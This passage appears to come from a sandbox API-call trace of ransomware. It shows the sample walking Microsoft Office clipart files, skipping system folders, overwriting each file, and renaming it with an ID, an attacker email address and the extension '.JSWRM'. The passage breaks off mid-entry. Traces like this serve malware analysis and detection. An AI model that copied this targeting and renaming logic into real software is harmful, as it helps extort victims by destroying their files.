WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01797_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01797_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01797_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0093.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0093.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0093.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01797_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.059] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3546) returned 1 [0093.059] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdd0) returned 0x23fc98 [0093.059] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xdd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xdd0, lpOverlapped=0x0) returned 1 [0093.080] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.080] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xdd0, lpOverlapped=0x0) returned 1 [0093.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0093.080] CloseHandle (hObject=0x314) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0093.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0093.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0093.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0093.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0093.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.080] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01797_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01797_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0093.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0093.081] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10196468, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10196468, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23d4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02120_.WMF", cAlternateFileName="")) returned 1 [0093.081] lstrcmpiW (lpString1="PE02120_.WMF", lpString2=".") returned 1 [0093.081] lstrcmpiW (lpString1="PE02120_.WMF", lpString2="..") returned 1 [0093.081] lstrcmpiW (lpString1="PE02120_.WMF", lpString2="...") returned 1 [0093.081] lstrcmpiW (lpString1="PE02120_.WMF", lpString2="windows") returned -1 [0093.081] lstrcmpiW (lpString1="PE02120_.WMF", lpString2="recovery") returned -1 [0093.081] lstrcmpiW (lpString1="PE02120_.WMF", lpString2="perflogs") returned -1 [0093.081] lstrcmpiW (lpString1="PE02120_.WMF", lpString2="documents and settings") returned 1 [0093.081] lstrcmpiW (lpString1="PE02120_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.081] lstrcmpiW (lpString1="PE02120_.WMF", lpString2="system volume information") returned -1 [0093.082] lstrcmpiW (lpString1="PE02120_.WMF", lpString2="msocache") returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0093.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02120_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02120_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02120_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0093.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02120_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02120_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02120_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0093.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0093.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0093.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02120_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.083] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9172) returned 1 [0093.083] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23d0) returned 0x24d210 [0093.083] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x23d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x23d0, lpOverlapped=0x0) returned 1 [0093.085] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.085] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x23d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x23d0, lpOverlapped=0x0) returned 1 [0093.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.085] CloseHandle (hObject=0x314) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0093.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0093.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0093.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0093.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0093.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0093.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0093.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02120_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02120_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0093.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0093.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0093.086] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fc4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02169_.WMF", cAlternateFileName="")) returned 1 [0093.086] lstrcmpiW (lpString1="PE02169_.WMF", lpString2=".") returned 1 [0093.086] lstrcmpiW (lpString1="PE02169_.WMF", lpString2="..") returned 1 [0093.086] lstrcmpiW (lpString1="PE02169_.WMF", lpString2="...") returned 1 [0093.086] lstrcmpiW (lpString1="PE02169_.WMF", lpString2="windows") returned -1 [0093.086] lstrcmpiW (lpString1="PE02169_.WMF", lpString2="recovery") returned -1 [0093.086] lstrcmpiW (lpString1="PE02169_.WMF", lpString2="perflogs") returned -1 [0093.087] lstrcmpiW (lpString1="PE02169_.WMF", lpString2="documents and settings") returned 1 [0093.087] lstrcmpiW (lpString1="PE02169_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.087] lstrcmpiW (lpString1="PE02169_.WMF", lpString2="system volume information") returned -1 [0093.087] lstrcmpiW (lpString1="PE02169_.WMF", lpString2="msocache") returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02169_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02169_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02169_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02169_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02169_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02169_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.087] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8132) returned 1 [0093.087] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fc0) returned 0x205850 [0093.088] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1fc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1fc0, lpOverlapped=0x0) returned 1 [0093.089] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.089] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1fc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1fc0, lpOverlapped=0x0) returned 1 [0093.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.090] CloseHandle (hObject=0x314) returned 1 [0093.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0093.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0093.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0093.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0093.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0093.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0093.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0093.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.090] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02169_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02169_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02169_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0093.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.091] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x75e2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02262_.WMF", cAlternateFileName="")) returned 1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2=".") returned 1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2="..") returned 1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2="...") returned 1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2="windows") returned -1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2="recovery") returned -1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2="perflogs") returned -1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2="documents and settings") returned 1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2="system volume information") returned -1 [0093.091] lstrcmpiW (lpString1="PE02262_.WMF", lpString2="msocache") returned 1 [0093.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02262_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02262_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02262_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02262_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02262_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02262_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0093.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0093.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02262_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.092] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30178) returned 1 [0093.092] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 